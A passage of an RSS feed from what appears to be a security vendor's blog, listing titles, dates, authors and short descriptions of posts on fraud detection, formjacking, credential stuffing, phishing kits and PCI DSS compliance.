checkout</title><link>https://cside.com/blog/card-testing-fraud-prevention-software</link><guid isPermaLink="true">https://cside.com/blog/card-testing-fraud-prevention-software</guid><description>See how browser-layer detection stops automated card testing at checkout using session behavior, AI agent signals, and device fingerprinting.</description><pubDate>Tue, 28 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Card+testing+fraud+prevention+software%3A+how+to+stop+automated+card+validation+at+checkout&amp;bannerTitle=Card+testing+fraud+prevention+software&amp;point=Blocks+card+testing+before+authorization&amp;point=Catches+AI+agent+and+scripted+checkouts&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>What is formjacking? How it works and how to detect it</title><link>https://cside.com/blog/formjacking</link><guid isPermaLink="true">https://cside.com/blog/formjacking</guid><description>Formjacking injects malicious JavaScript into checkout pages to steal card data as it is typed, invisible to WAFs and CSPs. Here is how to detect it.</description><pubDate>Tue, 28 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+formjacking%3F+How+it+works+and+how+to+detect+it&amp;bannerTitle=Formjacking%3A+how+it+works+and+how+to+detect+it&amp;point=Injects+JavaScript+to+steal+card+data&amp;point=Invisible+to+WAFs+and+CSPs&amp;point=Caught+by+real-session+script+monitoring" length="0" type="image/webp"/></item><item><title>What is credential stuffing? Definition, examples, and detection</title><link>https://cside.com/blog/what-is-credential-stuffing</link><guid isPermaLink="true">https://cside.com/blog/what-is-credential-stuffing</guid><description>Credential stuffing tests stolen username and password pairs from breaches against other sites. Learn how it works and how device signals catch it.</description><pubDate>Tue, 28 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+credential+stuffing%3F+Definition%2C+examples%2C+and+detection&amp;bannerTitle=What+is+credential+stuffing%3F+Definition+and+detection&amp;point=Stolen+breach+credentials%2C+replayed+at+scale&amp;point=Rate+limits+and+CAPTCHA+don%27t+stop+it&amp;point=Device+fingerprint+correlation+catches+it" length="0" type="image/webp"/></item><item><title>Account sharing detection: how to identify seat abuse before it costs you revenue</title><link>https://cside.com/blog/account-sharing-detection</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-detection</guid><description>Account sharing detection spots when several people share one login. See how device fingerprinting flags seat abuse without adding user friction.</description><pubDate>Mon, 27 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+sharing+detection%3A+how+to+identify+seat+abuse+before+it+costs+you+revenue&amp;bannerTitle=Account+sharing+detection+explained&amp;point=Spot+seat+abuse+without+user+friction&amp;point=Reads+device+fingerprints%2C+not+just+IPs&amp;point=Works+across+VPN%2C+incognito%2C+cleared+cookies" length="0" type="image/webp"/></item><item><title>Best bot detection and management software in 2026: 6 tools</title><link>https://cside.com/blog/best-bot-detection-software</link><guid isPermaLink="true">https://cside.com/blog/best-bot-detection-software</guid><description>Compare six bot detection and management tools for 2026 by detection layer, from network-edge bot mitigation to browser-layer AI agent detection.</description><pubDate>Mon, 27 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+bot+detection+and+management+software+in+2026%3A+6+tools&amp;bannerTitle=Bot+detection+and+management+software+2026&amp;point=Detection+vs+mitigation+vs+management&amp;point=Catch+AI+agents+in+real+browsers&amp;point=Browser-layer+device+intelligence" length="0" type="image/webp"/></item><item><title>How to get the browser time zone in JavaScript (2026 guide)</title><link>https://cside.com/blog/how-to-get-browser-timezone-javascript</link><guid isPermaLink="true">https://cside.com/blog/how-to-get-browser-timezone-javascript</guid><description>Get the browser time zone in JavaScript with one line of Intl code, read the UTC offset, handle DST, and use the zone as a fraud signal.</description><pubDate>Mon, 27 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+get+the+browser+time+zone+in+JavaScript+%282026+guide%29&amp;bannerTitle=Get+the+browser+time+zone+in+JavaScript&amp;point=The+one-line+Intl.DateTimeFormat+method&amp;point=UTC+offset%2C+DST%2C+and+older-browser+fallbacks&amp;point=Time+zone+as+a+fraud+and+fingerprinting+signal" length="0" type="image/webp"/></item><item><title>Browser Fingerprint Spoofing: How Attackers Bypass Detection and How to Stop Them</title><link>https://cside.com/blog/browser-fingerprint-spoofing</link><guid isPermaLink="true">https://cside.com/blog/browser-fingerprint-spoofing</guid><description>How attackers spoof browser fingerprints to evade fraud detection, and why layered signals catch what canvas-and-UA spoofing cannot.</description><pubDate>Sun, 26 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Browser+Fingerprint+Spoofing%3A+How+Attackers+Bypass+Detection+and+How+to+Stop+Them&amp;bannerTitle=Browser+fingerprint+spoofing+explained&amp;point=Spoofing+tools+are+commodity+software+now&amp;point=Behavioral+and+TLS+signals+resist+spoofing&amp;point=How+cside+catches+spoofed+fingerprints" length="0" type="image/webp"/></item><item><title>Applicant fraud detection software: identifying fake job applicants before they are hired</title><link>https://cside.com/blog/applicant-fraud-detection-software</link><guid isPermaLink="true">https://cside.com/blog/applicant-fraud-detection-software</guid><description>Applicant fraud detection software flags fake job applicants by analyzing device, network, and location signals during the application session.</description><pubDate>Fri, 24 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Applicant+fraud+detection+software%3A+identifying+fake+job+applicants+before+they+are+hired&amp;bannerTitle=Detect+fake+job+applicants+before+you+hire&amp;point=Analyze+device+and+network+session+signals&amp;point=Spot+VPNs+hiding+a+sanctioned+origin&amp;point=Flag+one+device+behind+many+identities" length="0" type="image/webp"/></item><item><title>Bank fraud prevention software: how browser-layer signals close the detection gap</title><link>https://cside.com/blog/bank-fraud-prevention-software</link><guid isPermaLink="true">https://cside.com/blog/bank-fraud-prevention-software</guid><description>Bank fraud prevention software must catch account takeover, new account fraud and synthetic identity fraud, and each vector leaves a browser-layer signal.</description><pubDate>Fri, 24 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Bank+fraud+prevention+software%3A+how+browser-layer+signals+close+the+detection+gap&amp;bannerTitle=Close+the+bank+fraud+detection+gap&amp;point=%2413.5B+US+account+takeover+losses+in+2025&amp;point=Device+fingerprints+server-side+tools+can%27t+see&amp;point=Detects+ATO%2C+new+account+%26+synthetic+fraud" length="0" type="image/webp"/></item><item><title>How to comply with PCI DSS 4.0.1 Requirement 6.4.3: a practical checklist</title><link>https://cside.com/blog/how-to-comply-with-pci-dss-6-4-3</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-pci-dss-6-4-3</guid><description>PCI DSS 6.4.3 requires a full inventory of every payment page script, with authorization, justification, and integrity controls for each one.</description><pubDate>Fri, 24 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+comply+with+PCI+DSS+4.0.1+Requirement+6.4.3%3A+a+practical+checklist&amp;bannerTitle=Comply+with+PCI+DSS+6.4.3%3A+a+practical+checklist&amp;point=Inventory+every+payment+page+script&amp;point=Authorize%2C+justify%2C+monitor+each+one&amp;point=Validated+for+6.4.3+and+11.6.1" length="0" type="image/webp"/></item><item><title>Best Magecart protection software 2026: script integrity on payment pages</title><link>https://cside.com/blog/best-magecart-protection-software</link><guid isPermaLink="true">https://cside.com/blog/best-magecart-protection-software</guid><description>Compare the best Magecart protection software for 2026, and see how real-time script monitoring meets PCI DSS 4.0.1 Requirements 6.4.3 and 11.6.1.</description><pubDate>Thu, 23 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+Magecart+protection+software+2026%3A+script+integrity+on+payment+pages&amp;bannerTitle=Best+Magecart+protection+software+2026&amp;point=Real-time+script+monitoring+on+payment+pages&amp;point=Meets+PCI+DSS+4.0.1+Req+6.4.3+and+11.6.1&amp;point=Free+tier%3A+2%2C000+pageviews+per+month" length="0" type="image/webp"/></item><item><title>Best privacy monitoring software 2026: beyond cookie consent</title><link>https://cside.com/blog/best-privacy-monitoring-software</link><guid isPermaLink="true">https://cside.com/blog/best-privacy-monitoring-software</guid><description>The best privacy monitoring software watches what third-party scripts actually do in the browser at runtime, not just which cookies a page sets.</description><pubDate>Thu, 23 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+privacy+monitoring+software+2026%3A+beyond+cookie+consent&amp;bannerTitle=Best+privacy+monitoring+software+for+2026&amp;point=Watch+what+scripts+do%2C+not+just+cookies+set&amp;point=Real-time+third-party+script+monitoring&amp;point=PCI+DSS+4.0.1+script+integrity+coverage" length="0" type="image/webp"/></item><item><title>How to detect and prevent credential stuffing in 2026: three signals that actually work</title><link>https://cside.com/blog/how-to-detect-credential-stuffing</link><guid isPermaLink="true">https://cside.com/blog/how-to-detect-credential-stuffing</guid><description>Detect and prevent credential stuffing with three signals that survive IP rotation: cross-account device reuse, new-device logins, and proxy detection.</description><pubDate>Thu, 23 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+detect+and+prevent+credential+stuffing+in+2026%3A+three+signals+that+actually+work&amp;bannerTitle=Detect+and+prevent+credential+stuffing+in+2026&amp;point=Catches+attacks+that+IP+rate+limiting+misses&amp;point=Correlates+device+fingerprints+across+accounts&amp;point=TLS+handshake+fingerprint+TLS+flags+VPN+and+residential+proxy+relay" length="0" type="image/webp"/></item><item><title>Account takeover fraud detection: how browser-layer signals catch ATO before login</title><link>https://cside.com/blog/account-takeover-fraud-detection</link><guid isPermaLink="true">https://cside.com/blog/account-takeover-fraud-detection</guid><description>Browser-layer signals flag attacker sessions before login completes, catching credential-stuffing attempts before any account is compromised.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+takeover+fraud+detection%3A+how+browser-layer+signals+catch+ATO+before+login&amp;bannerTitle=Catch+account+takeover+before+login+completes&amp;point=New+device+on+a+known+account+is+an+ATO+signal&amp;point=TLS+handshake+fingerprint+TLS+flags+VPN+and+proxy+sessions&amp;point=Correlate+stuffing+across+accounts" length="0" type="image/webp"/></item><item><title>AI agent security: why traditional bot detection cannot see the new threat</title><link>https://cside.com/blog/ai-agent-security</link><guid isPermaLink="true">https://cside.com/blog/ai-agent-security</guid><description>Autonomous AI agents run inside real browsers and slip past WAFs and CDN bot filters. Here is how browser-layer signals catch them per session.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=AI+agent+security%3A+why+traditional+bot+detection+cannot+see+the+new+threat&amp;bannerTitle=AI+agent+security%3A+seeing+the+threat+WAFs+miss&amp;point=WAFs+and+CDN+filters+cannot+see+AI+agents&amp;point=Canvas+entropy%2C+cadence%2C+cursor+geometry&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>The 8 best CAPTCHA alternatives in 2026</title><link>https://cside.com/blog/best-captcha-alternatives</link><guid isPermaLink="true">https://cside.com/blog/best-captcha-alternatives</guid><description>CAPTCHAs are dead, and bots solve them faster than humans in 2026. Here are the eight replacements web teams actually deploy, ranked by user friction and bot resistance.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=The+8+best+CAPTCHA+alternatives+in+2026&amp;bannerTitle=Best+CAPTCHA+alternatives+%282026%29&amp;point=Ranked+by+user+friction+vs+bot+resistance&amp;point=Covers+invisible%2C+honeypot%2C+and+PoW+options&amp;point=cside+included+as+browser-signal+option+at+%231" length="0" type="image/webp"/></item><item><title>Best chargeback evidence software 2026: win more disputes with session-level proof</title><link>https://cside.com/blog/best-chargeback-evidence-software</link><guid isPermaLink="true">https://cside.com/blog/best-chargeback-evidence-software</guid><description>Chargeback evidence software captures device fingerprint and session behavior at checkout, so merchants can prove what happened when disputes land.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+chargeback+evidence+software+2026%3A+win+more+disputes+with+session-level+proof&amp;bannerTitle=Best+chargeback+evidence+software+2026&amp;point=Capture+device+fingerprint+at+checkout&amp;point=Export+CE+3.0+evidence+in+seconds&amp;point=Win+more+friendly-fraud+disputes" length="0" type="image/webp"/></item><item><title>Best Chargeback Software: 10 Prevention Platforms for 2026</title><link>https://cside.com/blog/best-chargeback-prevention-software</link><guid isPermaLink="true">https://cside.com/blog/best-chargeback-prevention-software</guid><description>Chargeback prevention software stops disputes before they reach your acquirer. Ranked by VAMP fit and evidence quality: the 10 platforms for 2026.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+Chargeback+Software%3A+10+Prevention+Platforms+for+2026&amp;bannerTitle=Best+chargeback+prevention+software+%282026%29&amp;point=Ranked+by+VAMP+fit+and+evidence+quality&amp;point=Covers+pre-transaction%2C+alerts%2C+and+disputes&amp;point=cside+included+and+disclosed+at+%231" length="0" type="image/webp"/></item><item><title>The 10 best fraud detection software platforms in 2026</title><link>https://cside.com/blog/best-fraud-detection-software</link><guid isPermaLink="true">https://cside.com/blog/best-fraud-detection-software</guid><description>The fraud detection software fraud teams actually pick in 2026, ranked by browser-layer evidence, explainability, and false-positive economics.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=The+10+best+fraud+detection+software+platforms+in+2026&amp;bannerTitle=Best+fraud+detection+software+%282026%29&amp;point=Ranked+by+evidence+quality+and+false-positive+cost&amp;point=Covers+signal+layers+and+scoring+platforms&amp;point=cside+included+and+disclosed+at+%231" length="0" type="image/webp"/></item><item><title>The 10 best payment fraud detection software platforms in 2026</title><link>https://cside.com/blog/best-payment-fraud-detection-software</link><guid isPermaLink="true">https://cside.com/blog/best-payment-fraud-detection-software</guid><description>The payment fraud detection tools merchants actually pick in 2026, ranked by checkout evidence, Visa CE 3.0 support, and false-positive economics.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=The+10+best+payment+fraud+detection+software+platforms+in+2026&amp;bannerTitle=Best+payment+fraud+detection+software+%282026%29&amp;point=Ranked+by+checkout+evidence+quality&amp;point=Visa+CE+3.0+and+VAMP-ready&amp;point=cside+included+and+disclosed+at+%231" length="0" type="image/webp"/></item><item><title>The 10 best transaction monitoring software platforms in 2026</title><link>https://cside.com/blog/best-transaction-monitoring-software</link><guid isPermaLink="true">https://cside.com/blog/best-transaction-monitoring-software</guid><description>The transaction monitoring tools compliance and fraud teams pick in 2026, ranked by AML fit, alert quality, and false-positive economics.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=The+10+best+transaction+monitoring+software+platforms+in+2026&amp;bannerTitle=Best+transaction+monitoring+software+%282026%29&amp;point=Covers+AML%2C+fraud%2C+and+hybrid+platforms&amp;point=Ranked+by+alert+quality+and+evidence+depth&amp;point=cside+included+as+browser-signal+source+at+%231" length="0" type="image/webp"/></item><item><title>Inside a Live, Real-Time Google Credential-Phishing Kit: Fake CAPTCHA, Blob URLs and Encrypted WebSockets</title><link>https://cside.com/blog/inside-live-google-credential-phishing-kit</link><guid isPermaLink="true">https://cside.com/blog/inside-live-google-credential-phishing-kit</guid><description>A technical investigation of a live Google credential-phishing kit using fake CAPTCHA, blob URLs, remote-browser streaming and encrypted WebSockets.</description><pubDate>Wed, 22 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Taym Haddadi</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Inside+a+Live%2C+Real-Time+Google+Credential-Phishing+Kit%3A+Fake+CAPTCHA%2C+Blob+URLs+and+Encrypted+WebSockets&amp;bannerTitle=Inside+a+Live+Google+Phishing+Kit&amp;point=Fake+CAPTCHA+gates+the+phishing+flow&amp;point=Blob+URLs+hide+the+generated+document&amp;point=Trusted-sender+propagation+reached+multiple+victims" length="0" type="image/webp"/></item><item><title>Cookie Theft and Session Hijacking: How Attackers Steal Sessions and How to Stop Them</title><link>https://cside.com/blog/cookie-theft-session-hijacking-and-how-to-stop-pass-the-cookie-attacks</link><guid isPermaLink="true">https://cside.com/blog/cookie-theft-session-hijacking-and-how-to-stop-pass-the-cookie-attacks</guid><description>Cookie theft is when an attacker captures a session token from a logged-in user and replays it to impersonate them. No password needed, no MFA prompt. Here is how the attack works and how to stop it.</description><pubDate>Tue, 21 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Cookie+Theft+and+Session+Hijacking%3A+How+Attackers+Steal+Sessions+and+How+to+Stop+Them&amp;bannerTitle=Cookie+theft+and+session+hijacking&amp;point=A+stolen+cookie+bypasses+MFA+entirely&amp;point=17B%2B+cookie+records+on+dark+web+in+2024&amp;point=Device+binding+closes+the+gap+MFA+misses" length="0" type="image/webp"/></item><item><title>Magento PCI Compliance: Meeting PCI DSS 4.0.1 on Magento Stores</title><link>https://cside.com/blog/magento-pci-compliance</link><guid isPermaLink="true">https://cside.com/blog/magento-pci-compliance</guid><description>Magento merchants are not automatically PCI DSS compliant. Here is what Requirements 6.4.3 and 11.6.1 demand, what ASV scans miss, and how to close the client-side gap.</description><pubDate>Tue, 21 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Magento+PCI+Compliance%3A+Meeting+PCI+DSS+4.0.1+on+Magento+Stores&amp;bannerTitle=Magento+PCI+compliance&amp;point=Magento+does+not+provide+PCI+compliance+out+of+the+box&amp;point=ASV+scans+miss+client-side+JavaScript+threats&amp;point=Req+6.4.3+and+11.6.1+require+browser-layer+monitoring" length="0" type="image/webp"/></item><item><title>Consent Management Monitoring: Prove Your Cookie Consent Is Actually Enforced</title><link>https://cside.com/blog/consent-management-enforcement-guide</link><guid isPermaLink="true">https://cside.com/blog/consent-management-enforcement-guide</guid><description>A CMP records what visitors agreed to. It does not stop trackers from ignoring those choices. Here is how browser-layer monitoring closes the gap.</description><pubDate>Mon, 20 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Consent+Management+Monitoring%3A+Prove+Your+Cookie+Consent+Is+Actually+Enforced&amp;bannerTitle=Consent+Management+Monitoring+Explained&amp;point=See+which+trackers+fire+before+consent&amp;point=Catch+Reject+All+bypasses+in+real+sessions&amp;point=Generate+audit-ready+GDPR+evidence" length="0" type="image/webp"/></item><item><title>What Is Price Scraping and How to Stop It (2026)</title><link>https://cside.com/blog/what-is-price-scraping-and-how-to-stop-it</link><guid isPermaLink="true">https://cside.com/blog/what-is-price-scraping-and-how-to-stop-it</guid><description>Price scrapers harvest your catalog prices in real time, feeding competitor repricing engines. IP blocks and CAPTCHAs fail. Browser-layer behavioral detection does not.</description><pubDate>Mon, 20 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Price+Scraping+and+How+to+Stop+It+%282026%29&amp;bannerTitle=Stop+Price+Scraping+Bots&amp;point=Why+IP+blocks+and+CAPTCHAs+fail+against+modern+scrapers&amp;point=Browser+behavioral+signals+that+expose+scraping+sessions&amp;point=How+to+stop+price+scrapers+without+blocking+real+customers" length="0" type="image/webp"/></item><item><title>Homoglyph attacks in 2026: аpple.com is not apple.com (and how to actually detect the difference)</title><link>https://cside.com/blog/homoglyph-attacks</link><guid isPermaLink="true">https://cside.com/blog/homoglyph-attacks</guid><description>Homoglyph attacks use visually identical Unicode characters to register lookalike domains for phishing and script injection. Here is how they work, why browsers stopped protecting you, and what actually detects them.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Homoglyph+attacks+in+2026%3A+%D0%B0pple.com+is+not+apple.com+%28and+how+to+actually+detect+the+difference%29&amp;bannerTitle=Homoglyph+attacks+explained&amp;point=Cyrillic+%D0%B0+substitutes+for+Latin+a&amp;point=Browser+Punycode+fixes+are+inconsistent&amp;point=Script+inventory+catches+CDN+lookalikes" length="0" type="image/webp"/></item><item><title>TLS fingerprinting in 2026: what the ClientHello reveals (and where the signal fails)</title><link>https://cside.com/blog/tls-fingerprinting</link><guid isPermaLink="true">https://cside.com/blog/tls-fingerprinting</guid><description>TLS fingerprinting identifies the client library from the ClientHello handshake, before a single byte of HTTP is decrypted. Here is what it catches, what it misses, and where it belongs in a full detection stack.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=TLS+fingerprinting+in+2026%3A+what+the+ClientHello+reveals+%28and+where+the+signal+fails%29&amp;bannerTitle=TLS+fingerprinting+in+2026&amp;point=ClientHello+identifies+libraries+pre+HTTP&amp;point=Catches+naive+bots+before+app+logic+runs&amp;point=Not+a+defense+on+its+own%2C+a+cheap+layer" length="0" type="image/webp"/></item><item><title>8 types of credit card fraud your CS team will see in 2026 (and how to spot each one)</title><link>https://cside.com/blog/types-of-credit-card-fraud</link><guid isPermaLink="true">https://cside.com/blog/types-of-credit-card-fraud</guid><description>The 8 credit card fraud patterns your CS and fraud teams will see in 2026, with the concrete signal that separates each one from a legitimate transaction.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=8+types+of+credit+card+fraud+your+CS+team+will+see+in+2026+%28and+how+to+spot+each+one%29&amp;bannerTitle=8+types+of+credit+card+fraud&amp;point=8+patterns%2C+8+different+signals&amp;point=Friendly+fraud+is+the+biggest+single+bucket&amp;point=Device+intelligence+rules+them+all" length="0" type="image/webp"/></item><item><title>Credential Harvesting: How Attackers Steal Passwords in 2026</title><link>https://cside.com/blog/what-is-credential-harvesting</link><guid isPermaLink="true">https://cside.com/blog/what-is-credential-harvesting</guid><description>Credential harvesting has moved from bulk phishing to session cookie theft, Evilginx style MFA bypass, and third party script injection at login. Here is how detection actually works.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Credential+Harvesting%3A+How+Attackers+Steal+Passwords+in+2026&amp;bannerTitle=Credential+harvesting+in+2026&amp;point=Session+cookie+theft+beats+standard+MFA&amp;point=10B%2B+credentials+in+RockYou2024+corpus&amp;point=In+session+detection+is+the+only+reliable+stop" length="0" type="image/webp"/></item><item><title>What is cside? Browser-layer visibility for every visitor, human or agentic</title><link>https://cside.com/blog/what-is-cside</link><guid isPermaLink="true">https://cside.com/blog/what-is-cside</guid><description>cside is a browser-layer platform that gives security, fraud, privacy, and compliance teams visibility into what runs in every visitor&apos;s browser, human or agentic.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>product</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+cside%3F+Browser-layer+visibility+for+every+visitor%2C+human+or+agentic&amp;bannerTitle=What+is+cside%3F&amp;point=Browser-layer+visibility+for+every+visitor&amp;point=Security%2C+fraud%2C+privacy%2C+compliance+in+one+deployment&amp;point=Works+alongside+your+WAF%2C+CDN%2C+and+auth+stack" length="0" type="image/webp"/></item><item><title>Friendly fraud in 2026: why the customer wins the chargeback (and how to actually fight back)</title><link>https://cside.com/blog/what-is-friendly-fraud</link><guid isPermaLink="true">https://cside.com/blog/what-is-friendly-fraud</guid><description>Friendly fraud is not fraud in the traditional sense. It is a legitimate cardholder disputing a charge they actually made. Here is why most merchants lose these disputes and what CE 3.0 evidence changes.</description><pubDate>Sun, 19 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Friendly+fraud+in+2026%3A+why+the+customer+wins+the+chargeback+%28and+how+to+actually+fight+back%29&amp;bannerTitle=Friendly+fraud+in+2026&amp;point=70%25+of+chargebacks+are+friendly+fraud&amp;point=CE+3.0+evidence+rewrites+the+win+rate&amp;point=Device+continuity+is+the+deciding+proof" length="0" type="image/webp"/></item><item><title>New Account Fraud: What It Is, the Main Types, and How Detection Works</title><link>https://cside.com/blog/new-account-fraud</link><guid isPermaLink="true">https://cside.com/blog/new-account-fraud</guid><description>New account fraud (NAF) is fraud committed using a newly opened account. It comes in three forms, synthetic identity fraud, genuine identity manipulation, and fake account creation, each exploiting a different gap in standard registration controls.</description><pubDate>Sat, 18 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=New+Account+Fraud%3A+What+It+Is%2C+the+Main+Types%2C+and+How+Detection+Works&amp;point=NAF+cases+rose+31%25+in+2025+%28Javelin+Strategy+2026%29&amp;point=Synthetic+identity+fraud+targets+credit+and+lending+platforms&amp;point=Browser-layer+detection+catches+what+email+verification+misses" length="0" type="image/webp"/></item><item><title>What Is a Laptop Farm? How Fraud Operators Scale Human-Like Attacks</title><link>https://cside.com/blog/what-is-a-laptop-farm</link><guid isPermaLink="true">https://cside.com/blog/what-is-a-laptop-farm</guid><description>A laptop farm is a physical setup where operators run multiple devices under separate identities to simulate distinct users. Learn how they work and how browser signals expose them.</description><pubDate>Sat, 18 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+a+Laptop+Farm%3F+How+Fraud+Operators+Scale+Human-Like+Attacks&amp;bannerTitle=Laptop+Farm+Fraud+Explained&amp;point=Each+device+projects+a+separate+identity&amp;point=Traditional+IP+checks+see+nothing+unusual&amp;point=Browser+behavioral+signals+expose+the+operator" length="0" type="image/webp"/></item><item><title>What Is Formjacking? How the Attack Works and How to Stop It</title><link>https://cside.com/blog/what-is-formjacking</link><guid isPermaLink="true">https://cside.com/blog/what-is-formjacking</guid><description>Formjacking is a client-side attack that injects JavaScript to capture payment and login data as users type. Learn how the attack works, why traditional tools miss it, and how to detect it.</description><pubDate>Sat, 18 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Formjacking%3F+How+the+Attack+Works+and+How+to+Stop+It&amp;bannerTitle=What+is+formjacking%3F&amp;point=Runs+entirely+in+the+visitor%27s+browser&amp;point=Traditional+security+tools+cannot+see+it&amp;point=Caught+by+real-time+client-side+monitoring" length="0" type="image/webp"/></item><item><title>How to Detect AI Agents and Stealth Browsers: The Signals That Give Them Away</title><link>https://cside.com/blog/detect-ai-agents-stealth-browsers</link><guid isPermaLink="true">https://cside.com/blog/detect-ai-agents-stealth-browsers</guid><description>A signal-by-signal guide to detecting stealth and anti-detect browsers: CDP and webdriver tells, headless quirks, font and WebGL drift, and behavior.</description><pubDate>Wed, 15 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Detect+AI+Agents+and+Stealth+Browsers%3A+The+Signals+That+Give+Them+Away&amp;bannerTitle=Detect+AI+agents+and+stealth+browsers&amp;point=Read+automation+and+CDP+tells&amp;point=Catch+fingerprint+inconsistencies&amp;point=Confirm+with+behavior+over+time" length="0" type="image/webp"/></item><item><title>Does Shopify Make You PCI Compliant? What 6.4.3 &amp; 11.6.1 Still Require</title><link>https://cside.com/blog/does-shopify-make-you-pci-compliant-6-4-3-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/does-shopify-make-you-pci-compliant-6-4-3-11-6-1</guid><description>Shopify is a PCI DSS Level 1 service provider, but that certifies Shopify&apos;s own systems, not your storefront. Requirements 6.4.3 and 11.6.1 stay yours.</description><pubDate>Wed, 15 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Does+Shopify+Make+You+PCI+Compliant%3F+What+6.4.3+%26+11.6.1+Still+Require&amp;bannerTitle=Does+Shopify+make+you+PCI+compliant%3F&amp;point=Shopify+certifies+its+platform%2C+not+your+store&amp;point=App+scripts+and+Pixels+stay+in+your+PCI+scope&amp;point=6.4.3+and+11.6.1+are+your+obligations" length="0" type="image/webp"/></item><item><title>Ecommerce Fraud Prevention Software: 10 Best Platforms 